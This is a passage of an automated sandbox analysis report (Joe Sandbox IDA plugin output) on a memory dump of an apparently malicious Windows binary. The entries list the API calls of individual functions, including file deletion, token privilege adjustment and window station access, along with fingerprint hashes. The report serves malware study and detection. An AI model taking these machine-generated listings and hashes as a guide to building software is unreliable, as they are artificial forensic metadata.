                                                    • Part of subcall function 00E20FE6: __CxxThrowException@8.LIBCMT ref: 00E21031
                                                  • _memset.LIBCMT ref: 00E67CB4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throw_memsetstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 525207782-0
                                                  • Opcode ID: 17d269b819892d637847069c83abb87159fcfd1a93d3dc9174b4102066f8aeca
                                                  • Instruction ID: 4839969a04e1cdbe3671438a15c9e3a96eab62acbf505f86ff19e9a35e8cb49f
                                                  • Opcode Fuzzy Hash: 17d269b819892d637847069c83abb87159fcfd1a93d3dc9174b4102066f8aeca
                                                  • Instruction Fuzzy Hash: 5901F6742442009FD321EF5CE541F46BBE1AF59310F24849AF5C8AB392DB72E840CF90
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _fseek
                                                  • String ID:
                                                  • API String ID: 2937370855-0
                                                  • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                  • Instruction ID: be1cf3f7f5f0d7a80972161a3e65a96e9c48f833fd98aef2217dc26fb08f7f34
                                                  • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                  • Instruction Fuzzy Hash: EDF085B6400208BFDF108F85EC00CEBBBB9EF89324F104598F9046A210D232EA218BA0
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,?,?,00E127AF,?,00000001), ref: 00E14A63
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 514c6b0c22d278024293034aea9297937944fb47e7b2d932a3001b9edf2041e4
                                                  • Instruction ID: 58a6ba00c412b8b32c76ca179c5c2ac01804022895c84b136f34e234aa0f3530
                                                  • Opcode Fuzzy Hash: 514c6b0c22d278024293034aea9297937944fb47e7b2d932a3001b9edf2041e4
                                                  • Instruction Fuzzy Hash: 62F085B2181701CFCB348F24E490896BBF0AF0432A329A92EE1EAA3650D3319984CF04
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock
                                                  • String ID:
                                                  • API String ID: 2638373210-0
                                                  • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                  • Instruction ID: 600e1d3ab4fb81b9c5f49aaf1f0acadad2fa431916159885bb5158c2ffa70487
                                                  • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                  • Instruction Fuzzy Hash: A0F0587240020DFFDF04CF80C941EAABB79FF04314F208589FC189A212D372DA21AB91
                                                  APIs
                                                    • Part of subcall function 00E71E06: CloseHandle.KERNEL32(?,?,?,00E72D8B,?,?), ref: 00E71E12
                                                    • Part of subcall function 00E71E06: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00E72D8B,?,?), ref: 00E71E1F
                                                  • __beginthread.LIBCMT ref: 00E72D93
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateEventHandle__beginthread
                                                  • String ID:
                                                  • API String ID: 1494023155-0
                                                  • Opcode ID: bedfe2a4ccf2dda05cdc1c16f8c604a766ea8e17241ba325392f2bcc5be2dfd4
                                                  • Instruction ID: b1547573813ad0388e4e5877b4e36b3681bb034415607aa016b5396f244d7f6c
                                                  • Opcode Fuzzy Hash: bedfe2a4ccf2dda05cdc1c16f8c604a766ea8e17241ba325392f2bcc5be2dfd4
                                                  • Instruction Fuzzy Hash: A9E0DF32910310A6E735EA78D806FE67EE88F003A0F14D86EFB4D30092D6B46A84C2E1
                                                  APIs
                                                  • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E209E4
                                                    • Part of subcall function 00E11821: _memmove.LIBCMT ref: 00E1185B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: LongNamePath_memmove
                                                  • String ID:
                                                  • API String ID: 2514874351-0
                                                  • Opcode ID: 7cb12e7fe54130d094a9f7a23d54c5995e0f0274995951af7537e830d49fa52e
                                                  • Instruction ID: b53861cbc80a04103f54899c0559fda9c45b307a21f43ab127b8aa175403e9a1
                                                  • Opcode Fuzzy Hash: 7cb12e7fe54130d094a9f7a23d54c5995e0f0274995951af7537e830d49fa52e
                                                  • Instruction Fuzzy Hash: 65E086369002285BC721D6A89C05FEAB7DDDF89790F0441F7FD08E7204D9619C818691
                                                  APIs
                                                  • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00E64D31
                                                    • Part of subcall function 00E11821: _memmove.LIBCMT ref: 00E1185B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: FolderPath_memmove
                                                  • String ID:
                                                  • API String ID: 3334745507-0
                                                  • Opcode ID: f7efb39984aa571d2fc0fc963a1c583de23c13c465307f4ea38aa849a7644404
                                                  • Instruction ID: 06ea24c31f3b1e6356bdda5cdb71be9f742c4e68aca6bcbcb7d47c7fc3c0fa14
                                                  • Opcode Fuzzy Hash: f7efb39984aa571d2fc0fc963a1c583de23c13c465307f4ea38aa849a7644404
                                                  • Instruction Fuzzy Hash: EBD05EB590032C2FDB64E6A59C0DDFB7BACD744220F0006E27D6CD3101E9249D8586E1
                                                  APIs
                                                    • Part of subcall function 00E6384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00E63959,00000000,00000000,?,00E505DB,00EB8070,00000002,?,?), ref: 00E638CA
                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,00E505DB,00EB8070,00000002,?,?,?,00000000), ref: 00E63967
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: File$PointerWrite
                                                  • String ID:
                                                  • API String ID: 539440098-0
                                                  • Opcode ID: 77e5b39c9d4a62e3635b81e114908d305f2f4bd85107f7e9d7a7e78be5a2d229
                                                  • Instruction ID: 79415f6e93cde8a2e52663961f5c00dd72cad0957e4b78b7fce3fd89df90400e
                                                  • Opcode Fuzzy Hash: 77e5b39c9d4a62e3635b81e114908d305f2f4bd85107f7e9d7a7e78be5a2d229
                                                  • Instruction Fuzzy Hash: F3E04F35400208BFD720AF94D801ADAB7BCEB04310F00455BFD4092112D7B29E149B90
                                                  APIs
                                                  • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00E63E7D,?,?,?), ref: 00E63F0D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CopyFile
                                                  • String ID:
                                                  • API String ID: 1304948518-0
                                                  • Opcode ID: 466ab34ef0f2c97b72fe829686316d7fd03f44fc60faf55c40c5ce9fe8d82d62
                                                  • Instruction ID: 3838154d2efef919f3b290bde9c255dafcadc56440323e867d1768995d22e066
                                                  • Opcode Fuzzy Hash: 466ab34ef0f2c97b72fe829686316d7fd03f44fc60faf55c40c5ce9fe8d82d62
                                                  • Instruction Fuzzy Hash: 62D0A7315E020CBFEF50DFA0CC06F68B7ACE701706F1002A5B504E90E0DA7269189795
                                                  APIs
                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00E506E6,00000000,00000000,00000000), ref: 00E142BF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 036314a40f7976102e0db151d2bfc1420c13b8e1515724e0bb3088ecc0fb77e9
                                                  • Instruction ID: 5796ac67ff2b77c39ee5426c5f5868d29c5987828200369e329966ccc5db482d
                                                  • Opcode Fuzzy Hash: 036314a40f7976102e0db151d2bfc1420c13b8e1515724e0bb3088ecc0fb77e9
                                                  • Instruction Fuzzy Hash: AFD0C77464030CBFE710CB81DC46FA9777CE705710F500195FD0466290D6B27D548795
                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(?,00E63BFE), ref: 00E64FED
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 3165c64ab36d768e53cba72238f6def027d3599a5dfa24f01ec732d9efe73693
                                                  • Instruction ID: 085d2b87b03841a52147fba09a0f5c52a4ede9a4563e8a89d6e68821716bc3ca
                                                  • Opcode Fuzzy Hash: 3165c64ab36d768e53cba72238f6def027d3599a5dfa24f01ec732d9efe73693
                                                  • Instruction Fuzzy Hash: 2AB092B61816005A9DE81E3D2A48099330299423ED7D83B83E478A54E19239888BE520
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: __wfsopen
                                                  • String ID:
                                                  • API String ID: 197181222-0
                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                  • Instruction ID: 944c139824825cdd5d9b38bea03aa8d70de04652198853b60c4b23787bd7892f
                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                  • Instruction Fuzzy Hash: B0B0927644020CB7CE112A82FC03A697B69AB40668F408020FB1C2C162A673A6A09689
                                                  APIs
                                                  • GetLastError.KERNEL32(00000002,00000000), ref: 00E6D842
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID:
                                                  • API String ID: 1452528299-0
                                                  • Opcode ID: 7479b593224917ee4763414e0b6d3cad644134fabb943dca7d0696901022b395
                                                  • Instruction ID: 830e6c93e9cc99e7792714eb4f2135ed96b2a4107ff7ac07bfe8ca5d6f8c6146
                                                  • Opcode Fuzzy Hash: 7479b593224917ee4763414e0b6d3cad644134fabb943dca7d0696901022b395
                                                  • Instruction Fuzzy Hash: CD71B7706483018FC708EF64D891AAEB7E0BF88394F44656DF596A73A2DB30ED45CB52
                                                  APIs
                                                    • Part of subcall function 00E64005: FindFirstFileW.KERNEL32(?,?), ref: 00E6407C
                                                    • Part of subcall function 00E64005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00E640CC
                                                    • Part of subcall function 00E64005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E640DD
                                                    • Part of subcall function 00E64005: FindClose.KERNEL32(00000000), ref: 00E640F4
                                                  • GetLastError.KERNEL32 ref: 00E6C292
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                  • String ID:
                                                  • API String ID: 2191629493-0
                                                  • Opcode ID: badc06d997a6e316dfdf42da953ffb7a288770fa366679cd92d1f2b90d838497
                                                  • Instruction ID: 93e7cb0084aa8131a38c3bb2f1e8407ccc5f2d1bdbb9dafc8d762d0ca44d55cc
                                                  • Opcode Fuzzy Hash: badc06d997a6e316dfdf42da953ffb7a288770fa366679cd92d1f2b90d838497
                                                  • Instruction Fuzzy Hash: FCF0A7712105108FCB10EF59E850F69B7E5AF44760F058019FA45A7391CB70BC41CB94
                                                  APIs
                                                  • CloseHandle.KERNEL32(?,?,00000000,00E42F8B), ref: 00E142EF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID:
                                                  • API String ID: 2962429428-0
                                                  • Opcode ID: e7463ea59b1edb642fdd792df0893f2f9cf98f99a660049538d2dc2abb961b5e
                                                  • Instruction ID: 32a322c9839910e4d90cae78ede1c79357456c35ee84d44ff04b275b7e2046b7
                                                  • Opcode Fuzzy Hash: e7463ea59b1edb642fdd792df0893f2f9cf98f99a660049538d2dc2abb961b5e
                                                  • Instruction Fuzzy Hash: 30E07EB5500B018E82215F1AA804496FBE5ABA13613214A2EA0E6A26A0D2B058DACB50
                                                  APIs
                                                    • Part of subcall function 00E029E2: GetWindowLongW.USER32(?,000000EB), ref: 00E029F3
                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E8D208
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E8D249
                                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00E8D28E
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E8D2B8
                                                  • SendMessageW.USER32 ref: 00E8D2E1
                                                  • _wcsncpy.LIBCMT ref: 00E8D359
                                                  • GetKeyState.USER32(00000011), ref: 00E8D37A
                                                  • GetKeyState.USER32(00000009), ref: 00E8D387
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E8D39D
                                                  • GetKeyState.USER32(00000010), ref: 00E8D3A7
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E8D3D0
                                                  • SendMessageW.USER32 ref: 00E8D3F7
                                                  • SendMessageW.USER32(?,00001030,?,00E8B9BA), ref: 00E8D4FD
                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E8D513
                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E8D526
                                                  • SetCapture.USER32(?), ref: 00E8D52F
                                                  • ClientToScreen.USER32(?,?), ref: 00E8D594
                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E8D5A1
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E8D5BB
                                                  • ReleaseCapture.USER32 ref: 00E8D5C6
                                                  • GetCursorPos.USER32(?), ref: 00E8D600
                                                  • ScreenToClient.USER32(?,?), ref: 00E8D60D
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E8D669
                                                  • SendMessageW.USER32 ref: 00E8D697
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E8D6D4
                                                  • SendMessageW.USER32 ref: 00E8D703
                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E8D724
                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E8D733
                                                  • GetCursorPos.USER32(?), ref: 00E8D753
                                                  • ScreenToClient.USER32(?,?), ref: 00E8D760
                                                  • GetParent.USER32(?), ref: 00E8D780
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E8D7E9
                                                  • SendMessageW.USER32 ref: 00E8D81A
                                                  • ClientToScreen.USER32(?,?), ref: 00E8D878
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E8D8A8
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E8D8D2
                                                  • SendMessageW.USER32 ref: 00E8D8F5
                                                  • ClientToScreen.USER32(?,?), ref: 00E8D947
                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E8D97B
                                                    • Part of subcall function 00E029AB: GetWindowLongW.USER32(?,000000EB), ref: 00E029BC
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00E8DA17
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                  • String ID: @GUI_DRAGID$F
                                                  • API String ID: 3977979337-4164748364
                                                  • Opcode ID: c2ae4f8bca18592f4785f1bca6f70ebcd2847346106da798e78c40ab9be41b82
                                                  • Instruction ID: c18e7f59f118ceef48456bd118e79bae155ebac5769970ef54c98a6d30d457a4
                                                  • Opcode Fuzzy Hash: c2ae4f8bca18592f4785f1bca6f70ebcd2847346106da798e78c40ab9be41b82
                                                  • Instruction Fuzzy Hash: 8442AD712082419FD724EF28CC48FAABBE5FF88314F14161AF69DA72E1CB719859CB51
                                                  APIs
                                                    • Part of subcall function 00E59399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E593E3
                                                    • Part of subcall function 00E59399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E59410
                                                    • Part of subcall function 00E59399: GetLastError.KERNEL32 ref: 00E5941D
                                                  • _memset.LIBCMT ref: 00E58F71
                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E58FC3
                                                  • CloseHandle.KERNEL32(?), ref: 00E58FD4
                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E58FEB
                                                  • GetProcessWindowStation.USER32 ref: 00E59004
                                                  • SetProcessWindowStation.USER32(00000000), ref: 00E5900E
                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E59028
                                                    • Part of subcall function 00E58DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E58F27), ref: 00E58DFE
                                                    • Part of subcall function 00E58DE9: CloseHandle.KERNEL32(?,?,00E58F27), ref: 00E58E10
                                                  Strings
